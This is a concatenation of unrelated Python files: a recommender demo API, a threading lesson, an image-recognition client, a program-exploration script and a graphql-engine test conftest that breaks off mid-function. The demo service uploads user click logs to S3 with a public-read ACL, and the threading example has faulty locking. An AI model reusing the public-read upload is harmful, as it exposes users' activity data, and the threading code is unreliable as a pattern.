if rCache.load_data_into_hash(user_id_action_dict, user_id, json.dumps(new_click_data).encode('utf-8')):
logging.info(
'Save user_id_action_dict into Redis with key : %s ', user_id)
logging.info('refresh_user_click_data completed')
def response_failed(body, code):
return JSONResponse(status_code=code, content=body)
def mock_news_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("6552368441838272771"))
count = count + 1
return response_success({
"message": "mock retrieve news list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def mock_movie_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("movie test id"))
count = count + 1
return response_success({
"message": "mock retrieve movie list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_new_click_data(items_recommend_list, action_source):
new_click_data = []
for element in items_recommend_list:
new_click_data.append({element['id']: '0'})
final_click_data = {
'click_data': new_click_data,
'action_source': action_source
}
logging.info(
'generate_new_click_data completed {}'.format(final_click_data))
return final_click_data
def store_previous_click_data(user_id, action_type, scenario):
logging.info('store_previous_click_data start')
user_id_click_data_redis = rCache.get_data_from_hash(
user_id_action_dict, user_id)
if not bool(user_id_click_data_redis):
return
user_id_click_data = json.loads(user_id_click_data_redis, encoding='utf-8')
logging.info('previous click data {}'.format(user_id_click_data))
action_source = user_id_click_data['action_source']
click_data = user_id_click_data['click_data']
logging.info('previous click data action_source {}'.format(action_source))
current_timestamp = str(calendar.timegm(time.gmtime()))
s3_body = ''
connector = '_!_'
action_source_code = '0'
for element in click_data:
temp_array = []
# k is item id, v is action 0/1
for k, v in element.items():
temp_array.append(user_id)
temp_array.append(k)
temp_array.append(current_timestamp)
temp_array.append(action_type)
temp_array.append(v)
if action_source_code == '0':
action_source_code = get_action_source_code(action_source, k, scenario)
temp_array.append(action_source_code)
s3_body = s3_body + connector.join(temp_array) + '\n'
logging.info("store_previous_click_data data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['CLICK_RECORD_FILE_PATH'] + 'action_' + user_id + '_' + current_timestamp + '.csv', Body=s3_body, ACL='public-read')
logging.info('store_previous_click_data completed')
def get_action_source_code(action_source, item_id, scenario):
if action_source == 'recommend':
return '1'
else:
if scenario == 'news':
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('get item detail {}'.format(news_detail_record))
# e.g. 106, 107..
return news_detail_record['code']
else:
# e.g. 'action' or 'crime', movie type
return action_source
def get_user_id_by_name(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
if user_info_dict:
return user_info_dict['user_id']
logging.info("Cannot find user_id by name: {}".format(user_name))
return ''
def login_new_user(user_name, user_id):
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, {
"user_id": user_id,
"visit_count": 0,
"click_count": 0
})
def increase_visit_count(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
new_count = user_info_dict['visit_count'] + 1
user_info_dict['visit_count'] = new_count
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, user_info_dict)
logging.info("user_name:{}, visit_count: {}".format(user_name, new_count))
return new_count
def set_value_to_redis(dict_name, key, value):
rCache.load_data_into_hash(dict_name, key, json.dumps(value))
def get_dict_from_redis(dict_name, key):
logging.info("get dict {}[{}] from redis".format(dict_name, key))
val_bin = rCache.get_data_from_hash(dict_name, key)
if val_bin:
val_dict = json.loads(binary_to_str(val_bin))
else:
val_dict = {}
logging.info("return {}".format(len(val_dict)))
return val_dict
def response_success(body):
return body
def binary_to_str(bin_str):
return bin_str.decode('utf-8')
# movie
@app.get('/api/v1/demo/movie', tags=["demo"])
def get_recommend_movie(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_movie()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
return mock_movie_retrieve_response()
logging.info('recommend movie list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
movie_recommend_list = httpResp.json()['content']
logging.info('movie_recommend_list {}'.format(movie_recommend_list))
refresh_user_click_data(user_id, movie_recommend_list, '1', recommend_type, 'movie')
retrieve_response = generate_movie_retrieve_response(movie_recommend_list)
return retrieve_response
@app.post('/api/v1/demo/start_train', tags=["demo"])
def start_train_post(trainReq: TrainRequest):
logging.info('demo start_train_post start! change type: {}'.format(
trainReq.change_type))
if trainReq.change_type not in ['MODEL', 'CONTENT', 'ACTION']:
raise HTTPException(status_code=405, detail="invalid change_type")
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/start_train'
result = send_post_request(url, {
'change_type': trainReq.change_type
})
logging.info('executionArn: {}'.format(result['executionArn']))
response = {
"message": "Start train success",
"data": result
}
return response
@app.get('/api/v1/demo/offline_status/{executionArn}', tags=["demo"])
def offline_status(executionArn: str):
logging.info("offline_status start, executionArn {}".format(executionArn))
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/offline_status/'+executionArn)
if httpResp.status_code != 200:
return response_failed({
"message": "Error"
}, 400)
result = httpResp.json()['status']
logging.info('result {}'.format(result))
return result
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error(
"Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(
host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
logging.info('demo service start')
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=int(MANDATORY_ENV_VARS['DEMO_PORT']))
|
thread_queue.py
|
# Inter-thread communication
import time
import threading
import variables  # Don't use "from variables import detail_url_list": a thread's modifications would then be invisible to the other threads
from threading import Condition
# 1. Once the producer has produced 10 URLs it waits, so detail_url_list holds at most ten URLs
# 2. When the URL list is empty, the consumer pauses
def get_detail_html(lock):
# Crawl the article detail pages
detail_url_list = variables.detail_url_list
while True:
if len(variables.detail_url_list):
lock.acquire()
if len(detail_url_list):
url = detail_url_list.pop()  # Using the shared variable directly is not a thread-safe approach
lock.release()
# for url in detail_url_list:
print("get detail html started")
time.sleep(2)
print("get detail html end")
else:
lock.release()
time.sleep(1)
def get_detail_url(lock):
# Crawl the article list pages
detail_url_list = variables.detail_url_list
while True:
print("get detail url started")
time.sleep(4)
for i in range(20):
lock.acquire()
if len(detail_url_list) >= 10:
lock.release()
time.sleep(1)
else:
detail_url_list.append("http://projectsedu.com/{id}".format(id=i))
lock.release()
print("get detail url end")
# 1. Thread communication approach: shared variables
if __name__ == "__main__":
lock = threading.RLock()
thread_detail_url = threading.Thread(target=get_detail_url, args=(lock,))
for i in range(10):
html_thread = threading.Thread(target=get_detail_html, args=(lock,))
html_thread.start()
# # thread2 = GetDetailUrl("get_detail_url")
start_time = time.time()
# thread_detail_url.start()
# thread_detail_url1.start()
#
# thread1.join()
# thread2.join()
# When the main thread exits, the child threads are killed
print ("last time: {}".format(time.time()-start_time))
|
pipeline_http_client.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# from paddle_serving_server.pipeline import PipelineClient
import numpy as np
import requests
import json
import cv2
import base64
import os
from time import *
import threading
def demo(url,data,i):
begin_time = time()
r = requests.post(url=url, data=json.dumps(data))
end_time = time()
run_time = end_time-begin_time
print('Thread %d time %f' % (i, run_time))
print(r.json())
def cv2_to_base64(image):
return base64.b64encode(image).decode('utf8')
url = "http://127.0.0.1:9315/recognition/prediction"
with open(os.path.join(".", "test.jpg"), 'rb') as file:
image_data1 = file.read()
image = cv2_to_base64(image_data1)
for i in range(1):
print(i)
data = {"key": ["image"], "value": [image]}
r = requests.post(url=url, data=json.dumps(data))
print(r.json())
#t = threading.Thread(target=demo, args=(url,data,i,))
#t.start()
|
random_explore.py
|
import json
import time
import os
import random
import multiprocessing
import numpy as np
import tensorflow as tf
import nsm
from nsm import data_utils
from nsm import env_factory
from nsm import graph_factory
from nsm import model_factory
from nsm import agent_factory
from nsm import executor_factory
from nsm import computer_factory
import utils
# FLAGS
FLAGS = tf.app.flags.FLAGS
# Experiment name
tf.flags.DEFINE_string('output_dir', '', 'output directory')
tf.flags.DEFINE_string('experiment_name', 'experiment',
'All outputs of this experiment is'
' saved under a folder with the same name.')
tf.app.flags.DEFINE_integer(
'n_epoch', 1000, 'Number of exploration epochs.')
# Data
tf.app.flags.DEFINE_string(
'table_file', '', '.')
tf.app.flags.DEFINE_string(
'train_file_tmpl', '', 'Path to the file of training examples, a jsonl file.')
# Model
## Computer
tf.app.flags.DEFINE_integer(
'max_n_mem', 100, 'Max number of memory slots in the "computer".')
tf.app.flags.DEFINE_integer(
'max_n_exp', 3, 'Max number of expressions allowed in a program.')
tf.app.flags.DEFINE_integer(
'max_n_valid_indices', 100, 'Max number of valid tokens during decoding.')
tf.app.flags.DEFINE_string(
'executor', 'wtq', 'Which executor to use, wtq or wikisql.')
# Exploration
tf.app.flags.DEFINE_integer(
'n_explore_samples', 50, '.')
tf.app.flags.DEFINE_integer('save_every_n', 10, '.')
tf.app.flags.DEFINE_integer('id_start', 0, '.')
tf.app.flags.DEFINE_integer('id_end', 0, '.')
tf.app.flags.DEFINE_string(
'trigger_word_file', '', '.')
tf.app.flags.DEFINE_integer('n_process', -1, '.')
tf.logging.set_verbosity(tf.logging.INFO)
def get_experiment_dir():
experiment_dir = os.path.join(FLAGS.output_dir, FLAGS.experiment_name)
return experiment_dir
def random_explore(env, use_cache=True, trigger_dict=None):
env = env.clone()
env.use_cache = use_cache
question_tokens = env.question_annotation['tokens']
if 'pos_tag' in env.question_annotation:
question_tokens += env.question_annotation['pos_tags']
invalid_functions = []
if trigger_dict is not None:
for function, trigger_words in trigger_dict.iteritems():
for w in trigger_words:
if w in question_tokens:
break
else:
invalid_functions.append(function)
ob = env.start_ob
while not env.done:
invalid_actions = env.de_vocab.lookup(invalid_functions)
valid_actions = ob[0].valid_indices
new_valid_actions = list(set(valid_actions) - set(invalid_actions))
# No action available anymore.
if len(new_valid_actions) <= 0:
return None
new_action = np.random.randint(0, len(new_valid_actions))
action = valid_actions.index(new_valid_actions[new_action])
ob, _, _, _ = env.step(action)
if sum(env.rewards) >= 1.0:
return env.de_vocab.lookup(env.mapped_actions, reverse=True)
else:
return None
def run_random_exploration(shard_id):
experiment_dir = get_experiment_dir()
if not tf.gfile.Exists(experiment_dir):
tf.gfile.MkDir(experiment_dir)
if FLAGS.trigger_word_file:
with open(FLAGS.trigger_word_file, 'r') as f:
trigger_dict = json.load(f)
print 'use trigger words in {}'.format(FLAGS.trigger_word_file)
else:
trigger_dict = None
# Load dataset.
train_set = []
with open(FLAGS.train_file_tmpl.format(shard_id), 'r') as f:
for line in f:
example = json.loads(line)
train_set.append(example)
tf.logging.info('{} examples in training set.'.format(len(train_set)))
table_dict = {}
with open(FLAGS.table_file) as f:
for line in f:
table = json.loads(line)
table_dict[table['name']] = table
tf.logging.info('{} tables.'.format(len(table_dict)))
if FLAGS.executor == 'wtq':
score_fn = utils.wtq_score
process_answer_fn = lambda x: x
executor_fn = executor_factory.WikiTableExecutor
elif FLAGS.executor == 'wikisql':
score_fn = utils.wikisql_score
process_answer_fn = utils.wikisql_process_answer
executor_fn = executor_factory.WikiSQLExecutor
else:
raise ValueError('Unknown executor {}'.format(FLAGS.executor))
all_envs = []
t1 = time.time()
for i, example in enumerate(train_set):
if i % 100 == 0:
tf.logging.info('creating environment #{}'.format(i))
kg_info = table_dict[example['context']]
executor = executor_fn(kg_info)
api = executor.get_api()
type_hierarchy = api['type_hierarchy']
func_dict = api['func_dict']
constant_dict = api['constant_dict']
interpreter = computer_factory.LispInterpreter(
type_hierarchy=type_hierarchy,
max_mem=FLAGS.max_n_mem, max_n_exp=FLAGS.max_n_exp, assisted=True)
for v in func_dict.values():
interpreter.add_function(**v)
interpreter.add_constant(
value=kg_info['row_ents'], type='entity_list', name='all_rows')
de_vocab = interpreter.get_vocab()
env = env_factory.QAProgrammingEnv(
data_utils.Vocab([]), de_vocab, question_annotation=example,
answer=process_answer_fn(example['answer']),
constants=constant_dict.values(),
interpreter=interpreter,
constant_value_embedding_fn=lambda x: None,
score_fn=score_fn,
max_cache_size=FLAGS.n_explore_samples * FLAGS.n_epoch * 10,
name=example['id'])
all_envs.append(env)
program_dict = dict([(env.name, []) for env in all_envs])
for i in xrange(1, FLAGS.n_epoch + 1):
tf.logging.info('iteration {}'.format(i))
t1 = time.time()
for env in all_envs:
for _ in xrange(FLAGS.n_explore_samples):
program = random_explore(env, trigger_dict=trigger_dict)
if program is not None:
program_dict[env.name].append(program)
t2 = time.time()
tf.logging.info('{} sec used in iteration {}'.format(t2 - t1, i))
if i % FLAGS.save_every_n == 0:
tf.logging.info('saving programs and cache in iteration {}'.format(i))
t1 = time.time()
with open(os.path.join(
get_experiment_dir(), 'program_shard_{}-{}.json'.format(shard_id, i)), 'w') as f:
program_str_dict = dict([(k, [' '.join(p) for p in v]) for k, v
in program_dict.iteritems()])
json.dump(program_str_dict, f, sort_keys=True, indent=2)
# cache_dict = dict([(env.name, list(env.cache._set)) for env in all_envs])
t2 = time.time()
tf.logging.info(
'{} sec used saving programs and cache in iteration {}'.format(
t2 - t1, i))
n = len(all_envs)
solution_ratio = len([env for env in all_envs if program_dict[env.name]]) * 1.0 / n
tf.logging.info(
'At least one solution found ratio: {}'.format(solution_ratio))
n_programs_per_env = np.array([len(program_dict[env.name]) for env in all_envs])
tf.logging.info(
'number of solutions found per example: max {}, min {}, avg {}, std {}'.format(
n_programs_per_env.max(), n_programs_per_env.min(), n_programs_per_env.mean(),
n_programs_per_env.std()))
# Macro average length.
mean_length = np.mean([np.mean([len(p) for p in program_dict[env.name]]) for env in all_envs
if program_dict[env.name]])
tf.logging.info('macro average program length: {}'.format(
mean_length))
# avg_cache_size = sum([len(env.cache._set) for env in all_envs]) * 1.0 / len(all_envs)
# tf.logging.info('average cache size: {}'.format(
# avg_cache_size))
def collect_programs():
saved_programs = {}
for i in xrange(FLAGS.id_start, FLAGS.id_end):
with open(os.path.join(
get_experiment_dir(),
'program_shard_{}-{}.json'.format(i, FLAGS.n_epoch)), 'r') as f:
program_shard = json.load(f)
saved_programs.update(program_shard)
saved_program_path = os.path.join(get_experiment_dir(), 'saved_programs.json')
with open(saved_program_path, 'w') as f:
json.dump(saved_programs, f)
print 'saved programs are aggregated in {}'.format(saved_program_path)
def main(unused_argv):
ps = []
for idx in xrange(FLAGS.id_start, FLAGS.id_end):
p = multiprocessing.Process(target=run_random_exploration, args=(idx,))
p.start()
ps.append(p)
for p in ps:
p.join()
collect_programs()
if __name__ == '__main__':
tf.app.run()
|
conftest.py
|
import pytest
import time
from context import HGECtx, HGECtxError, ActionsWebhookServer, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient, PytestConf, GraphQLWSClient
import threading
from auth_webhook_server import create_server, stop_server
import random
from datetime import datetime
import sys
import os
from collections import OrderedDict
from validate import assert_response_code
def pytest_addoption(parser):
parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--test-webhook-request-context", action="store_true",
help="Run Test cases for testing webhook request context"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containing the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--test-startup-db-calls",
action="store_true",
default=False,
required=False,
help="Run testcases for startup database calls"
)
parser.addoption(
"--test-function-permissions",
action="store_true",
required=False,
help="Run manual function permission tests"
)
parser.addoption(
"--test-streaming-subscriptions",
action="store_true",
default=False,
required=False,
help="Run streaming subscription tests"
)
parser.addoption(
"--test-jwk-url",
action="store_true",
default=False,
required=False,
help="Run testcases for JWK url behaviour"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
parser.addoption(
"--skip-schema-teardown",
action="store_true",
default=False,
required=False,
help="""
Skip tearing down the schema/Hasura metadata after tests. This option may result in test failures if the schema
has to change between the list of tests to be run
"""
)
parser.addoption(
"--skip-schema-setup",
action="store_true",
default=False,
required=False,
help="""
Skip setting up schema/Hasura metadata before tests.
This option may result in test failures if the schema has to change between the list of tests to be run
"""
)
parser.addoption(
"--avoid-error-message-checks",
action="store_true",
default=False,
required=False,
help="""
This option when set will ignore disparity in error messages between expected and response outputs.
Used basically in version upgrade/downgrade tests where the error messages may change
"""
)
parser.addoption(
"--collect-upgrade-tests-to-file",
metavar="<path>",
required=False,
help="When used along with collect-only, it will write the list of upgrade tests into the file specified"
)
parser.addoption(
"--test-unauthorized-role",
action="store_true",
help="Run testcases for unauthorized role",
)
parser.addoption(
"--test-no-cookie-and-unauth-role",
action="store_true",
help="Run testcases for no unauthorized role and no cookie jwt header set (cookie auth is set as part of jwt config upon engine startup)",
)
parser.addoption(
"--enable-remote-schema-permissions",
action="store_true",
default=False,
help="Flag to indicate if the graphql-engine has enabled remote schema permissions",
)
parser.addoption(
"--redis-url",
metavar="REDIS_URL",
help="redis url for cache server",
default=False
)
parser.addoption(
"--backend",
help="run integration tests using a particular backend",
default="postgres"
)
parser.addoption(
"--pro-tests",
action="store_true",
default=False,
help="Flag to specify if the pro tests are to be run"
)
parser.addoption(
"--test-developer-api-enabled", action="store_true",
help="Run Test cases with the Developer API Enabled",
default=False
)
parser.addoption(
"--test-auth-webhook-header",
action="store_true",
default=False,
required=False,
help="Run testcases for auth webhook header forwarding"
)
parser.addoption(
"--test-read-only-source",
action="store_true",
default=False,
required=False,
help="Run testcases with a read-only database source"
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
# Pytest has removed the global pytest.config
# As a solution we are going to store it in PytestConf.config
PytestConf.config = config
if is_help_option_present(config):
return
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl()
def pytest_report_collectionfinish(config, startdir, items):
"""
Collect server upgrade tests to the given file
"""
tests_file = config.getoption('--collect-upgrade-tests-to-file')
sep=''
tests=OrderedDict()
if tests_file:
def is_upgrade_test(item):
# Check if allow_server_upgrade_tests marker are present
# skip_server_upgrade_tests marker is not present
return item.get_closest_marker('allow_server_upgrade_test') \
and not item.get_closest_marker('skip_server_upgrade_test')
with open(tests_file,'w') as f:
upgrade_items = filter(is_upgrade_test, items)
for item in upgrade_items:
# This test should be run separately,
# since its schema setup has function scope
if 'per_method_tests_db_state' in item.fixturenames:
tests[item.nodeid] = True
elif any([ (x in item.fixturenames)
for x in
[ 'per_class_tests_db_state',
'per_class_db_schema_for_mutation_tests'
]
]):
# For this test, schema setup has class scope
# We can run a class of these tests at a time
tests[item.parent.nodeid] = True
# Assume tests can only be run separately
else:
tests[item.nodeid] = True
for test in tests.keys():
f.write(test + '\n')
return ''
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
if is_help_option_present(node.config):
return
# Pytest has removed the global pytest.config
node.workerinput["hge-url"] = node.config.hge_url_list.pop()
node.workerinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
if is_help_option_present(config):
return
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.workerinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.workerinput["pg-url"]
try:
hge_ctx = HGECtx(hge_url, pg_url, config)
except HGECtxError as e:
assert False, "Error from hge_ctx: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
# TODO why do we sleep here?
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='module')
def actions_fixture(hge_ctx):
if hge_ctx.is_default_backend:
pg_version = hge_ctx.pg_version
if pg_version < 100000: # version less than 10.0
pytest.skip('Actions are not supported on Postgres version < 10')
# Start actions' webhook server
webhook_httpd = ActionsWebhookServer(hge_ctx, server_address=('127.0.0.1', 5593))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
use_action_fixtures = pytest.mark.usefixtures(
"actions_fixture",
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests'
)
@pytest.fixture(scope='class')
def functions_permissions_fixtures(hge_ctx):
if not hge_ctx.function_permissions:
pytest.skip('These tests are meant to be run with --test-function-permissions set')
return
use_function_permission_fixtures = pytest.mark.usefixtures(
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests',
'functions_permissions_fixtures'
)
@pytest.fixture(scope='class')
def streaming_subscriptions_fixtures(hge_ctx):
if not hge_ctx.streaming_subscriptions:
pytest.skip('These tests are meant to be run with --test-streaming-subscriptions set with pytest')
return
@pytest.fixture(scope='class')
def pro_tests_fixtures(hge_ctx):
if not hge_ctx.pro_tests:
pytest.skip('These tests are meant to be run with --pro-tests set')
return
@pytest.fixture(scope='class')
def scheduled_triggers_evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5594))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def gql_server(request, hge_ctx):
server = HGECtxGQLServer(request.config.getoption('--pg-urls'), 5991)
yield server
server.teardown()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
"""
This fixture provides an Apollo GraphQL websockets client
"""
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def ws_client_graphql_ws(request, hge_ctx):
"""
This fixture provides an GraphQL-WS client
"""
client = GraphQLWSClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def per_class_tests_db_state(request, hge_ctx):
"""
Set up the database state for select queries.
Has a class level scope, since select queries do not change database state.
Expects either a `dir()` method which provides the directory
with `setup.yaml` and `teardown.yaml` files,
or class variables `setup_files` and `teardown_files` that provide
the list of setup and teardown files respectively.
By default, for a postgres backend the setup and teardown is done via
the `/v1/query` endpoint. To set up using the `/v1/metadata` (metadata setup)
and `/v2/query` (DB setup) endpoints, set `setup_metadata_api_version` to "v2".
"""
yield from db_state_context(request, hge_ctx)
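# A minimal sketch (hypothetical, not an actual test in this suite) of a test class that
# satisfies the contract described above: it exposes a `dir()` classmethod pointing at a
# directory that is assumed to contain setup.yaml and teardown.yaml.
@pytest.mark.usefixtures('per_class_tests_db_state')
class ExampleSelectQueries:
    @classmethod
    def dir(cls):
        return 'queries/graphql_query/example'  # hypothetical directory
    def test_select_query_works(self, hge_ctx):
        # a real test would POST a query file via hge_ctx here
        pass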
@pytest.fixture(scope='function')
def per_method_tests_db_state(request, hge_ctx):
"""
This fixture sets up the database state for metadata operations
Has a function level scope, since metadata operations may change both the schema and data
Class method/variable requirements are similar to that of per_class_tests_db_state fixture
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='class')
def per_class_db_schema_for_mutation_tests(request, hge_ctx):
"""
This fixture sets up the database schema for mutations.
It has a class level scope, since mutations do not change the schema.
Expects either a `dir()` class method which provides the directory with `schema_setup.yaml` and `schema_teardown.yaml` files,
or variables `schema_setup_files` and `schema_teardown_files`
that provide the list of setup and teardown files respectively
"""
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
check_file_exists = hge_ctx.backend == backend
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
db_context = db_context_with_schema_common(
request, hge_ctx, 'schema_setup_files', 'schema_setup.yaml', 'schema_teardown_files', 'schema_teardown.yaml', check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
@pytest.fixture(scope='function')
def per_method_db_data_for_mutation_tests(request, hge_ctx, per_class_db_schema_for_mutation_tests):
"""
This fixture sets up the data for mutations.
Has a function level scope, since mutations may change data.
Having just the setup file(s), or the teardown file(s) is allowed.
Expects either `dir()` class method which provides the directory with `values_setup.yaml` and / or `values_teardown.yaml` files.
The class may provide a `values_setup_files` variable which contains the list of data setup files,
or a `values_teardown_files` variable which provides the list of data teardown files.
"""
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(values_setup, values_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['values_setup', 'values_teardown']
]
yield from db_context_common(
request, hge_ctx, 'values_setup_files', values_setup,
'values_teardown_files', values_teardown,
False, False, False
)
@pytest.fixture(scope='function')
def backend():
"This fixture provides a default `backend` value for the `per_backend_tests` fixture"
return 'postgres'
@pytest.fixture(scope='function', autouse=True)
def per_backend_tests(hge_ctx, backend):
"""
This fixture ignores backend-specific tests unless the relevant --backend flag has been passed.
"""
# Currently, we default all tests to run on Postgres with or without a --backend flag.
# As our test suite develops, we may consider running backend-agnostic tests on all
# backends, unless a specific `--backend` flag is passed.
if not hge_ctx.backend == backend:
pytest.skip(
'Skipping test. Add --backend ' + backend + ' to run backend-specific tests'
)
return
def db_state_context(request, hge_ctx):
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
